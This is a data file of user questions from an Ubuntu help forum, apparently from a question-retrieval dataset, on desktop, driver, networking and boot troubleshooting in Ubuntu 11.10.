83794	how to monitor if a network connection is stable during the day	we have a mysql server working on ubuntu server . many clients ( using a windows xp app ) give us the `` lost connection to mysql server during query '' . how can i track down the problem ? the server is always fully functional and i do n't have any diagnostic idea . the server is sitting on a vmware esxi and has always worked perfectly .
83798	multiple bluetooth problems when connected	bluetooth does n't work correctly on my system ( it works fine in windows 7 ) . when i 'm using it , it always crashes my computer . this happened many times just after ( or few minutes later ) when i send my files to a mobile phone or even when i only try to connect to it ! i tried to send files to another mobile phone , but the effect is the same . i also tried to use it on guest account , but it still does n't work correctly - well , i received something about 10 % of the all combined sent files ( on my account too ) , but how much effort did it cost ? my pc : os : ubuntu 11.10 64-bit ram : 3,9gib mib ( ddr2 ) processor : amd athlon ( tm ) 64 processor 3500+ graphics card : nvidia corporation g73 [ geforce 7300 gt ] ( rev a1 ) with newest drivers ( 173 . ) informations from sudo lspci -nn 00:00.0 ram memory [ 0500 ] : nvidia corporation mcp55 memory controller [ 10de:0369 ] ( rev a1 ) 00:01.0 isa bridge [ 0601 ] : nvidia corporation mcp55 lpc bridge [ 10de:0363 ] ( rev a2 ) 00:01.1 smbus [ 0c05 ] : nvidia corporation mcp55 smbus [ 10de:0368 ] ( rev a2 ) 00:01.2 ram memory [ 0500 ] : nvidia corporation mcp55 memory controller [ 10de:036a ] ( rev a2 ) 00:02.0 usb controller [ 0c03 ] : nvidia corporation mcp55 usb controller [ 10de:036c ] ( rev a1 ) 00:02.1 usb controller [ 0c03 ] : nvidia corporation mcp55 usb controller [ 10de:036d ] ( rev a2 ) 00:04.0 ide interface [ 0101 ] : nvidia corporation mcp55 ide [ 10de:036e ] ( rev a1 ) 00:05.0 ide interface [ 0101 ] : nvidia corporation mcp55 sata controller [ 10de:037f ] ( rev a2 ) 00:05.1 ide interface [ 0101 ] : nvidia corporation mcp55 sata controller [ 10de:037f ] ( rev a2 ) 00:06.0 pci bridge [ 0604 ] : nvidia corporation mcp55 pci bridge [ 10de:0370 ] ( rev a2 ) 00:06.1 audio device [ 0403 ] : nvidia corporation mcp55 high definition audio [ 10de:0371 ] ( rev a2 ) 00:08.0 bridge [ 0680 ] : nvidia corporation mcp55 ethernet [ 10de:0373 ] ( rev a2 ) 00:0f.0 pci bridge [ 0604 ] : nvidia corporation mcp55 pci express bridge [ 10de:0377 ] ( rev a2 ) 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration [ 1022:1100 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map [ 1022:1101 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller [ 1022:1102 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control [ 1022:1103 ] 01:07.0 ethernet controller [ 0200 ] : d-link system inc rtl8139 ethernet [ 1186:1300 ] ( rev 10 ) 01:0a.0 firewire ( ieee 1394 ) [ 0c00 ] : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) [ 104c:8024 ] 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation g73 [ geforce 7300 gt ] [ 10de:0393 ] ( rev a1 ) informations from lsusb ( last one is bluetooth device ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 03f0:8711 hewlett-packard bus 002 device 002 : id 1241:1603 belkin keyboard bus 002 device 003 : id 046d : c52f logitech , inc. wireless mouse m305 bus 002 device 004 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) and also from lspci 00:00.0 ram memory : nvidia corporation mcp55 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp55 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp55 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp55 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp55 usb controller ( rev a1 ) 00:02.1 usb controller : nvidia corporation mcp55 usb controller ( rev a2 ) 00:04.0 ide interface : nvidia corporation mcp55 ide ( rev a1 ) 00:05.0 ide interface : nvidia corporation mcp55 sata controller ( rev a2 ) 00:05.1 ide interface : nvidia corporation mcp55 sata controller ( rev a2 ) 00:06.0 pci bridge : nvidia corporation mcp55 pci bridge ( rev a2 ) 00:06.1 audio device : nvidia corporation mcp55 high definition audio ( rev a2 ) 00:08.0 bridge : nvidia corporation mcp55 ethernet ( rev a2 ) 00:0f.0 pci bridge : nvidia corporation mcp55 pci express bridge ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:07.0 ethernet controller : d-link system inc rtl8139 ethernet ( rev 10 ) 01:0a.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) 02:00.0 vga compatible controller : nvidia corporation g73 [ geforce 7300 gt ] ( rev a1 )
83799	unity broken after logging into gnome ?	unity seems to have broken itself ! i logged out of a unity session and logged back into a gnome/openbox session to try out the gnome shell . i logged in however , the gnome shell did n't seem to start up , and i was left literally staring at my desktop wallpaper . i rebooted my laptop and logged in back into a regular ubuntu session . however , instead of unity starting up , the only desktop environment i get is my desktop wallpaper with a menu bar running along the top . no tray , no unity launcher , no lenses , nothing . what went wrong here ? how can i get my unity working again ? and how can i try out gnome shell without seemingly breaking my ubuntu installation ?
83800	liferea dev build with indicator-applet ?	stable liferea 1.6.4 provided by ubuntu packaging system is build with indicator-applet ( just like there is mail indicator , im indicator etc ) . it 's easy for evoking and it displays unread feeds beautifully and it 's informative just the way i like , like other indicators however i removed this 1.6.4 version and installed latest dev - 1.8-rc2 from source , as i learned there is google reader support ( subscription and synchronising ) , starting from 1.7 version . everything seems fine , only i do n't have indicator applet and i would like to know if it 's not so hard to install it with it . i found unstable liferea ppa ( by same team that packages stable release ) but could n't find a way to ask this question there . also latest unstable in that ppa is 1.7.5 and i doubt if i should install through this ppa , as i 've read that 1.7 branch is too buggy and this 1.8-rc2 seems to work well on my system it does n't seem that this is duplicate : how do i get liferea 1.8 rc to use the global application menu ? i 'm asking about indicator applet instead systray update : i removed my source build and installed liferea unstable from provided ppa : it does not have indicator applet subscribining to google reader account places all feeds in one folder - it does not respect google reader folders like 1.8-rc2 i have installed i removed it
83801	configure internet connection across ubuntu server	i 've been looking for an answer for my problem but i 've found some things that i could n't understand . i have a network with some machines running windows and ubuntu desktop . i also have one server running ubuntu server . everything works fine . that i want is make this server a firewall . i supose that i must have two network cards ( i actually have them ) and connect isp modem to eth0 and eth1 goes to the switch where are the other machines connected . i read about shorewall but i do n't know how to configure it and i ca n't connect to internet with the others . my current configuration ( lan works ok , but wan does n't ) is the following : server : auto eth0 iface eth0 inet static address 192.168.1.250 gateway 192.168.1.4 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 auto eth2 iface eth2 inet static address 192.168.1.2 gateway 127.0.0.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.26.255 the client has as a gateway the ip of eth2 with this configuration , i ca n't connect to the internet . if i do a ping to 192.168.1.2 or 250 , it replies successfully .
83802	how to i add more space to ubuntu ? i dont have admin in windows 7 but i do in ubuntu	i just want more room for games and whatnot . please help . i 'm really stuck , because i do n't understand partitioning or anything . please make it noob friendly . ubuntu 11.10 . its a school pc and they said they wont partition it .
83803	bcm 4306 not recognized after upgrade on a dell latitude d600	this is extremely frustrating to me . i had the wireless card working before i upgraded to 11.10 . at first the wireless device was recognized but it told me there was no firmware , so i went ahead and went through the process i did before of installing the b43/b43legacy firmware , and now my wireless device is not even recognized , or showing up anywhere ! 02:03.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11a/b/g [ 14e4:4324 ] ( rev 03 )
83807	vmware player disconnected my soundcard , how can i re-connect it ?	when connecting the sound-card to the guest os on vmware player , it notified me it would disconnect it from the host ( ubuntu ) and connect it to the guest . i disconnected the soundcard from the guest , and exit vmware player , yet my laptop internal sound is not working . i am assuming it is still disconnected , how can i re-connected or find what is causing the problem ? or at lest reset my audio settings ? note : my laptop seems to have two devices , one for headphones/speaker and one for the internal sound , when i choose internal audio analog stereo and plug my headphones , sound works ...
83808	battery monitor not showing on boot up of ubuntu 11.10	when i boot up ubuntu 11.10 , my battery monitor does not show up , it only does when the battery is low , or i plug in my power cord . i want it to come up even if i am on battery on start up . when the battery monitor is on , putting in watch -n 1 acpi -b in terminal works like a charm . i installed jupiter to help with power retaining , but i would love some help on getting my battery monitor up . i am using ubuntu 11.10 with unity . is there a solution to make my battery monitor start on boot up ?
83809	how can i customize the ubuntu installer ?	i would like to know how can i customize the ubuntu installer not customize ubuntu , i just want to modify the installer . we have a large environment here with lots of developers and since we do n't use windows , i want to customize the installer to automatically set the timezone to nyc , the keyboard layout to english usa , put the company logo in the installer etc ...
83822	why did firefox 8 work with windows xp but not ( initially ) with ubuntu 's os ?	windows xp is over 10 years old now . and yet on the day that firefox 8 came out , it installed and ran fine on the microsoft os . but firefox 8 could not do the same on ubuntu . ( there was a 2 week delay in release to ubuntu ) . why did mozilla 's release version of firefox 8 `` just work '' on windows xp ( a 10 years old os ) but would n't `` just work '' on ubuntu , even on 11.10 ( which was less than a month old ) ? why did mozilla release firefox 8 if it was n't going to work on ubuntu ?
83824	how can i start a vnc server before log on ?	i would like to run x11vnc ( or another vnc server ) on my desktop , but i 'm unable to find a way to get it to start before any users log in . back when i was using vanilla ubuntu 10.10 vino did this by default . however , i ca n't find a way to do it now in xubuntu .
83828	good alternative for rhythmbox for podcasts ?	i am currently using rhythmbox for my podcasts ( around 50 feeds ) and i am looking for an alternative due to it 's numerous short comings and bugs , among other things : it crashes every now and then lacks ability to redownload failed downloads you can delete episodes , but you have no way to see deleted episodes you ca n't see podcast that do n't have any new episodes , they are completely invisible in the gui since after the ubuntu 11.10 upgrade it has started to convert mp3 before copying them to the mp3 player , however not all , just some random ones for no obvious reason does n't support parallel download from multiple hosts does n't give control over which feeds are auto downloaded does n't keep track of last listening position ... however i am actually quite happy with the overall user-interface of rhythmbox , a simple listview with all the podcast titles , track length and release date that i can sort is exactly what i want . i would however like to have more control , ability to group multiple feeds would be nice and in general just features that make it easy to track large number of podcasts . alternatives i have looked at so far : gpodder : does n't look bad , but its focused on download only , not playing podcasts , it gets very slow with large number of podcasts , it makes downloading a big issue with pop-ups and stuff , instead of a thing that happens mostly transparent in the background banshee : might be a good alternative if it would n't be for the lack of simple listview , it only has this awkward iconview that allows no way to sort the podcast episodes amarok : extremely ugly interface , podcasts seem to be an afterthought , hidden on the left pane with most of the interface being useless , no way to sort episodes after release date , etc . liferea : good : support for the whole rss feed , not just podcasts , bad : support for the actual mp3 is extremely awkward with it being just an attachment miro : does n't support syncing to mp3 player devices
83829	looking for mass cropping software	i 'm looking for a tool than runs on ubuntu that can let me : open an image in a folder which has thousands crop and rotate it save as a copy , automatically named ( not manually ) , with one click . preferably with something in the name that i can later use to filter these cropped copies in nautilus ( unless it saves in another directory , that 'd be even better ) . move to next image and repeat does it exist ?
83830	what rules to use for ufw ?	i 've decided to enable the ufw that comes with ubuntu just to make my system even more secure ( especially after watching a video of a person whose computer actually got infected ! ) , and i 've enabled ufw and installed gufw , but i 'm not sure what to do next . when i check the status of the firewall , it says that it is active . what are some rules that i should configure to actually make use of the firewall , since right now i 'm assuming it 's allowing everything , basically acting like it is n't there .
83831	using grep , awk , etc . to filter command output	i 'll use route as an example . route -n the above outputs routing information . the top row is your active connection . i can manipulate the output to only the second column by doing : route -n | awk ' { print $ 2 } ' now , how can i filter by row ?
83835	where do i file a bug regarding the unlock screen ?	when you lock your screen , and then try typing your password to unlock it , your wallpaper does n't obey the `` fit '' settings ( zoom , stretch , etc ) . this is a bug that needs fixing , and i 'm not sure where to report this .
83838	why is ntfs-3g not included anymore by default ?	why is ntfs-3g not included anymore in ubuntu 11.10 ? now i ca n't write to my ntfs partition . just curiosity , why the change ?
83846	current protocol for installing xen with as a dom0 ?	i tried to install xen a few weeks ago with ubuntu 11.10 as the dom0 . at the time , i encountered too many problems to list here . and an internet search revealed that others were having similar problems . although my searches revealed a few workarounds , ultimately i punted ubuntu and used fedora 16 as the dom0 . ( the process for getting fedora 16 up and running as the dom0 for xen was relatively painless . ) ubuntu is my preferred distro , and so i 'd like to try again . but before i do so , could anyone kindly recommend a site that provides current and up-to-date tips , including a list dependencies that i 'll need , for installing xen with ubuntu 11.10 as a dom0 ? ( i fear that many of the sites and answers that i previously found may be out of date . ) or better still , would someone kindly post a brief , but up-to-date , tutorial here ? thanks much !
83848	how to auto-start all screenlets in unity only ( not gnome-shell ) ?	i want to auto-start all screenlets in unity environment only as it also auto-start in gnome-shell too ( as it is not working well in gnome-shell ) , i , e , i want to only edit one file not all screenlet items files as i have a lot of sceenlets on my desktop and i know how to auto-start an application from this site .
83849	why does my window border disappeared ?	when i use keyboard shortcut alt+space+x to maximize window , the window border always disappeared , and i ca n't handle it . so what 's going on ? how can i fix it ? my ubuntu version is 11.10 . thanks !
83850	problem with radeon hd 6870 on ubuntu 11.10	hello i got the radeon hd 6870 on my new computer and i install ubuntu 11.10 , the problem is that when i installed the amd catalyst 11.11 and i play a 1080p video is n't as smooth as i hope to be , ( it 's hard to explain ) it 's like if the video was a little bit slow , and it 's annoying . so i uninstall the drivers and the video looks very good ( as smooth as my ps3 for example ) but the colors are horrible and the resolution sucks , it 's 1080p the same as my tv but it look like it was bigger so i ca n't see half of the bar on the left side and i ca n't see the bar in the up side of my desktop . my question is : what drivers do you recommend me to install , and if you recommend me the catalyst , do you know a configuration for a smoother video ? ? ? thanks .
83851	can i use gnome 3 themes and icons with unity too ?	i like to play around with themes and icons to make my desktop looking more lovely . can i use the themes and icons also for unity 3d/2d , or what do i have to look for to know when and how i have to use them ?
83853	gnome-shell notifications in the tray gets overcrowded	the notification tray at the bottom of my desktop screen gets overcrowded with notification icons after several notify-send messages appear . is there a way to clear this tray ?
83856	installed .cer security cerificate	( linux noob here ) i have been trying to resolve this all day , my university uses secure w2 to control access to its wireless network , i have a copy of the security certificate but i cant seem to install it correctly , all the examples refer to .crt file types and they do n't seem to work with .cer files . can anyone guide me through the process of installing a .cer security certificate ?
83858	unity does not run .xsession/.xsession/.xsessionrc/.xinitrc on login	i recently moved from fedora 14 to ubuntu 12.04 and in the past , i disabled my touchpad and configured my trackpoint settings with .xsession , which would execute on login . now , with ubuntu 12.04 , i can not get that file to execute at login . i 've tried renaming it to ~/.xinitrc , ~/.xsessionrc , ~/.xsession , and ~/.xsession , but none of these are executed . i 've tried with both unity2d and unity3d .
83863	how do i get a canon pixma mg 3150 working ?	i 've got the new canon pixma mg 3150 and so far , i ca n't seem to find a driver anywhere . i do have the cd for both windows and mac , but this does n't help me , as i have ubuntu 11.10 . i 'd prefer to have it running on the wifi . i 'm really new to this , so i need for you to explain this to me as basically as possible .
83867	is there any way to change the dock location ?	i 've been a long time pc user , in fact i bought windows 7 less than a year ago , but it got a virus so i downloaded ubuntu unity . i like it much better , but like mac and the dell dock , you can change the location of the dock . i was wondering if you can do this with the unity launcher . i wanted to move it to the bottom instead of the left . thanks !
83868	compress in .tgz	i want to compress files in .tgz . i know how to make tar.gz ( with tar and gzip ) and some people say it is almost the same , but i need to make a .tgz , how ? ?
83869	setting up a pppoe connection in ubuntu ?	i have a new broadband connection and i want to connect it using ubuntu . i have a user name and a password , nothing more . i want to know how to connect to such network , how to create the connection ?
83875	how to create website shortcuts on the desktop / in a folder using chrome ?	help with something really basic , which i am unable to figure out . in windows creating a shortcut ( link ) for a website is as easy as dragging-and-dropping the favicon/address bar to the desktop or a folder . i tried the same in ubuntu ( chrome browser ) , but it 's not working . the web page is being saved as a file , but not as a link/shortcut . am i missing something or is there no way to quickly create shortcuts to web pages/web sites without installing some app for that ? if the above is true , is there an app that does what i need ? i hope i am clear enough .
83880	how can i edit /etc/skel while keeping the default folders on live cd	i 'm making a live cd with all of the features i need in ubuntu . i 've installed gnome-shell and some extensions and i want to make it start `` on '' when the instalation finishes . i 've copied the folders `` .config/ '' and `` .gconf/ '' to `` /etc/skel/ '' after configuring my default user , but every time i install ubuntu , after that i ca n't find the default folders ( desktop , public , videos , music ... ) . i 've tried everything i knew , does someone know how i can do what i 'm trying to ? ( sorry about my bad english , i 'm a brazilian guy )
83895	i got my z-5 logitech speakers to work , but whenever i restart , i have to reconfigure them	this is the content of my alsa-base.conf file ( for some reason , the entries preceded by # are bolded -- anyway ) : # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 alias snd-card-0 snd-usb-audio alias snd-card-1 snd-hda-intel options snd-usb-audio index=0 options snd-hda-intel index=1 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 options snd-usb-audio index=-2 options snd-usb-audio index=0 alias snd-card-0 snd-usb-audio alias snd-card-1 snd-hda-intel options snd-hda-intel index=1 i deleted a line that said something like `` # keep usb-audio from being loaded as first soundcard '' and that made the speakers work for the first time ( before this , they never showed up ) . i also added the last four lines . anyway , what can i add to this so that i do n't have to reconfigure them each time i restart ? currently , i have to open sound settings , then under the hardware tab , select analog stereo output , and then unplug my usb speakers and plug them back in . this makes them pop up so that i can see them . otherwise , it will not show my z-5 speakers as a device that can be configured . more info : also , i have to open up sound settings , and select the hardware tab for the z-5 speakers to even show up to select . if i do n't have the sound settings open when i unplug and replug , then the speakers do not show up when i open sound settings .
83901	unable to install q4wine	i just came bask to ask another question . i installed ubuntu ( again ) , but i 'm having trouble installing q4wine . when i try to install , it gives me this : q4wine : depends : libc6 ( > = 2.4 ) but 2.13-0ubuntu13 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.5.2-8ubuntu4 is to be installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libqt4-sql ( > = 4:4.5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libqtgui4 ( > = 4:4.5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.5.2-8ubuntu4 is to be installed depends : sqlite3 ( > = 3.5.6 ) but 3.7.4-2ubuntu5 is to be installed help highly appreciated . thanks .
83905	how to setup domain name for schooltool local server	i am currently testing schooltool 2.0 and i would like to do some things : this application is installed on a virtual machine running ubuntu server 11.10 bridged to our home network . the site is accessible through ip address . what i would like to do is setup a local domain , say schooltool.ourhomedomain.com . i thought my sister would appreciate it more if it were not via ip address . if there 's anymore information needed , let me know . thanks in advance !
83906	unity launcher does not appear in 11.10 on mouseover	i can reach the launcher with the superkey , but that '' s just about it . when i move my mouse all the way to the left , nothing happens .
83907	how can i boot into recovery mode if it hangs booting single user ?	how can i boot into recovery mode if it hangs booting into single user mode ? i am trying to boot into `` recovery mode '' or any single user mode , but upstart is trying to start modem-manager no matter what . it says `` modem-manager could not connect to system bus '' and sits there retrying , forever . can i boot into single user mode and tell upstart to not try starting the modem ? can i boot single user and tell upstart to start a shell after drives are mounted ? thanks for any help in advance ... update : i was able to use the grub init=/bin/bash trick to get a command prompt on booting . from there i was able to apt-get purge modemmanager . but i still get an error about ca n't connect to system bus and a hang . is there a way to put upstart into extra verbose mode so i can see what is causing the hang ?
83912	how can i boot to upstart failsafe mode ?	http : //upstart.ubuntu.com/cookbook/ # failsafe-mode-ubuntu-specific says 11.10 introduced a new failsafe mode . how can i boot to it ? what commands do i give grub to pass to upstart to do this failsafe thing . what is this failsafe thing ? how is it different from recovery mode ? it seems the upstart cookbook is lacking in this area .
83916	mplayer ca n't play *.wmv file	i have a problem when i use the mplayer to play *.wmv file on my ubuntu11.10 . there are some error messages here . could anyone can help me solve this problem . i use some keyword to search in gooele , but i ca n't find the answer . thank you . playing testmovie.wmv . asf file format detected . [ asfheader ] audio stream found , -aid 1 [ asfheader ] video stream found , -vid 2 video : [ wmv3 ] 1280x720 24bpp 1000.000 fps 4000.0 kbps ( 488.3 kbyte/s ) load subtitles in ./ open : no such file or directory [ mga ] could n't open : /dev/mga_vid open : no such file or directory [ mga ] could n't open : /dev/mga_vid [ vo_tdfxfb ] ca n't open /dev/fb0 : permission denied . [ vo_3dfx ] unable to open /dev/3dfx . [ vdpau ] error when calling vdp_device_create_x11 : 1 ========================================================================== opening video decoder : [ dmo ] dmo video codecs dmo dll supports vo optimizations 0 1 dmo dll might use previous sample when requested mplayer interrupted by signal 11 in module : init_video_codec i am using xv as my video driver .
83924	metadata wo n't show in u1 music for android	i ca n't get the metadata to display on u1 music for android . all i get is `` unknown artist '' and `` unknown album '' . everything shows up in banshee . the files live in my purchased music folder and were purchased within the last few weeks . the phone is a samsung admire , sch-r720 .
83925	configure empathy with office communicator 2007	i am using pidgin with sipe to connect with office communicator 2007 . is it is possible with empathy ? i had imported from pidgin but it is not working .
83927	what directories to backup	if i not only want to save personal data , but want to ensure that i can be up and running in a very quick amount of time , what is the best backup strategy ? i.e. , is there a way to backup just the home file system and save the list of things to do from an install disk ? besides data loss , i 'm more concerned that i try some video driver and decide that i want to go back to my system state before i installed that bad video driver .
83928	why is my chrome so slow ?	chrome became slow . why is that ? firefox is much faster in ubuntu , but i prefer chrome , because it gives more `` space '' . thank you .
83938	i ca n't install my ati card drivers . i 'm using the ati radeon hd5450	i just installed new drivers ( the amd ones ) from theyr'e site ... but now i want to remove them.. is there any way to that that so i can use the open source drivers again ... they worked a lot better . karel @ karel-workstationbree : ~ $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc cedar pro [ radeon hd 5450 ] [ 1002:68f9 ] i installed using this link http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ? type=2.4.1 & product=2.4.1.3.42 & lang=english then i just run the installation ... . i know that my card is supported by ubuntu , and my other drivers are disabled ... but i want to know how i can restore the open source drivers and delete the ati drivers . any help would b e greatly appreciated .
83941	how do i pass `` acpi=off '' to my kernel on boot ?	when i tried to upgrade from 11.04 to 11.10 the system froze , so i 've been playing around with a couple other linux builds ( fedora , mint , and puppy ) the last couple days and i keep coming around to the same problem : a lockup during boot ; each build referencing a kernel error . on another board someone suggested booting with a boot up line of `` acpi = off '' . it works with other os ' , but i 'm not sure where to put this command . can anyone 'enlighten ' me , please ?
83943	version to version upgrades and bugs -- dns errors	i 've been using ubuntu ( 64-bit ) for the past three versions ( 10.10 , 11.04 , now 11.10 ) . for the most part , things are fine . i have issues with the 64-bit version , but who does n't . my question is whether doing the upgrades for that many versions contributes to the bugs that i see . i went from 10.10 to 11.04 by using the built-in upgrade process . from there , i went to 11.10 with the same process . i seem to get various dns errors ( such as trying to go to facebook sends me to a server that has nothing to do with facebook . ) this does n't seem to happen on my windows ( work ) or macbook ( notebook ) computers . i 've been thinking of doing a clean install with the hopes that it will solve some of the issues i see . but , i really have no basis to believe this will actually help . /etc/resolv.conf # generated by networkmanager domain hsd1.il.comcast.net . search hsd1.il.comcast.net . nameserver 192.168.1.1 nameserver 68.87.72.134 nameserver 68.87.77.134
83945	how do i install zimbra desktop ?	i 'd like to install zimbra desktop but i 'm worried about picking logical installation locations and how it will integrate with the unity desktop . if it does n't appear in the messaging menu there is n't much i can do about that , but what about the launcher ? there does n't seem to be ppa or similar resource . these instructions for 10.10 seem complete : http : //www.ubuntugeek.com/how-to-install-zimbra-desktop-on-ubuntu-10-10-maverick.html 6 if you would , accept the default directori where it install /opt/zimbra/zdesktop is this the logical location for ubuntu ? 9 now you’ll be asked about where to install files , for example : home//.zdesktop sounds right . is it ? 10 and then you’ll be asked about the path where to locate the icon where you’ll launch zimbra , for example : /home//desktop how about this ?
83947	alt-tab in unity 2d makes app icon jiggle instead of switching	i 'm using unity 2d as my desktop , and it works fine most of the time , but every now and then , i try to alt-tab to switch to a different application , and instead of switching to that window , the launcher bar opens , and the icon of the application i was trying to switch to starts jiggling . if i try to switch to something else , that icon starts jiggling too . if i click on the icon with the mouse , then it stops jiggling and switches to the requested window . what is this behavior ? i have n't seen any mention of jiggling icons in unity . i do n't understand the original purpose of this , and i 'd like a way to fix it so that i wo n't have to use the mouse . edit : i get that this is a bug , but someone must have had to code that jiggling effect . what is it used for ? is it some relic of old behavior , or something new that has n't been implemented yet , what ?
83948	graphics card recommendation for dual-hd output ?	i 'm wanting a dual hd monitor desktop . desktop system with two monitor outputs ( 1920x1080 and 1920x1200 ) side-by-side , displaying one x screen ( xinerama , twinview , xrandr , whatever works ) . will be running ubuntu 11.10 64-bit with unity 3d . looking for a recommended graphics card for such a setup . other requirements : dual dvi output . or dual-hdmi output if it works with ubuntu . smooth non-buggy desktop compositing in unity 3d/compiz smooth rendering of ( chrome ) browser and non-accelerated ide windows . at least 60fps on fullscreen glxgears ( 1920x1200 resolution ) , but not looking to play games . smooth fullscreen video playback ( just because )
83950	gksudo waits for a few seconds after execution	i 'm frequently using application launchers to run personal bash scripts and thus i often use gksudo in case i do administrative tasks . the problem is that when i execute a command with gksudo , the execution is successful , but afterwards gksudo waits for about 5 seconds before it closes/finishes . in some scripts i use gksudo multiple times , resulting in execution times of a few minutes , even though everything should be done in a few seconds . can anyone help me here ? ps : here are my main /etc/sudoers-settings ( might have something to do with my problem ) : defaults env_reset , ! tty_tickets , timestamp_timeout=2 phoenix all= nopasswd : /bin/mount , /bin/umount , /usr/sbin/firestarter , /usr/bin/truecrypt , /usr/bin/apt-get
83957	how to install ubuntu without any extra packages that are currently installed by default ?	i 'm just looking to install ubuntu 11.10 + de ( unity and it 's dependencies ) . all the other extra packages such as firefox/thunderbird/video player/etc and any other package that is not a dependency of a core package i do n't want to install .
83958	how to make a window transparent by clicking a program 's title bar ?	in an earlier version of ubuntu with compiz i 'm pretty sure there was a useful setting to enable seeing what 's behind the current window by clicking and holding the title bar , which then changed the current window 's opacity to something like 10 percent . is there any way to achieve this in ubuntu 11.10 ?
83962	assign keyboard shortcut to program	on my windows machine i press winkey + c and a calculator pops up . i find this very useful - is there any way to achieve this in ubuntu ?
83965	ubuntu 10.04 cant adjust brightness on my lenovo thinkpad ?	i cant seem to be able to adjust the brightness on my think-pad laptop running ubuntu 10.04 . in the power management applet it shows that the power is set to 100 % , but even if i try to lower it the actual screen brightness dosent change . any ideas of how i can get around this ? i tried changing the brightness from the terminal but its already set to max brightness ( however the actual screen brightness is no that bright at all ) . thanks
83970	map a key to another key as keyboard damaged	my @ or 2 key is not working . i want to set it like , if user press alt + a or something the 2 should be inserted to the active window . i have achieved this in windows using auto it . in ubuntu i saw some solutions but could n't do it . any help would be appreciated . or else i will be forced to move back to windows : - (
